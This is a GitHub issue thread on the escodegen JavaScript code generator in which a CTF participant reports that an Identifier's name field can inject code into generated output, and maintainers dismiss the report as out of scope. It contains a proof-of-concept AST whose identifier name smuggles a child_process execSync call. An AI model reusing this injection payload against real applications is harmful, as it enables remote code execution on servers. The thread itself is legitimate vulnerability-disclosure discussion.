search

estools / escodegen

ECMAScript code generator
BSD 2-Clause "Simplified" License
2.64k stars 334 forks source link

Security issue with statement expression parser for identifiers #453

Closed Zombiehelp54 closed 1 year ago

Zombiehelp54 commented 1 year ago

This issue was found during blackhat middle east CTF, the bug lies in the expression parser for statement expressions of type "Identifier".

Here is an example ECMAScript AST object that will break out of a "CatchClause" statement: 


{
    "type": "Program",
    "body": [
      {
        "type": "TryStatement",
        "block": {
          "type": "BlockStatement",
          "body": [
            {
              "type": "VariableDeclaration",
              "declarations": [
                {
                  "type": "VariableDeclarator",
                  "id": {
                    "type": "Identifier",
                    "name": "a"
                  },
                  "init": {
                    "type": "Literal",
                    "value": "test",
                    "raw": "'test'"
                  }
                }
              ],
              "kind": "var"
            }
          ]
        },
        "handler": {
          "type": "CatchClause",
          "param": {
            "type": "Identifier",
            "name": "e"
          },
          "body": {
            "type": "BlockStatement",
            "body": [
              {
                "type": "ExpressionStatement",
                "expression": {
                  "type": "Identifier",
                  "name": "a} this.process.mainModule.require('child_process').execSync('touch /tmp/pwnd'); function x(){"
                }
              }
            ]
          }
        },
        "finalizer": null
      }
    ],
    "sourceType": "script"
  }

Output: 

> escodegen.generate(ast);

'try {\n' +
  "    var a = 'test';\n" +
  '} catch (e) {\n' +
  "    a} this.process.mainModule.require('child_process').execSync('touch /tmp/pwnd'); function x(){;\n" +
  '}'

Expected output should return a parsing error. If an application is vulnerable to prototype pollution this bug can lead to RCE.

Constellation commented 1 year ago

Expected output should return a parsing error.

escodegen is not assuming an invalid AST. It is not checking input is right or wrong. So, out of scope.

michaelficarra commented 1 year ago

Agreed with @Constellation. Additionally, there is no risk to escodegen users here since the generated program is not evaluated in any way.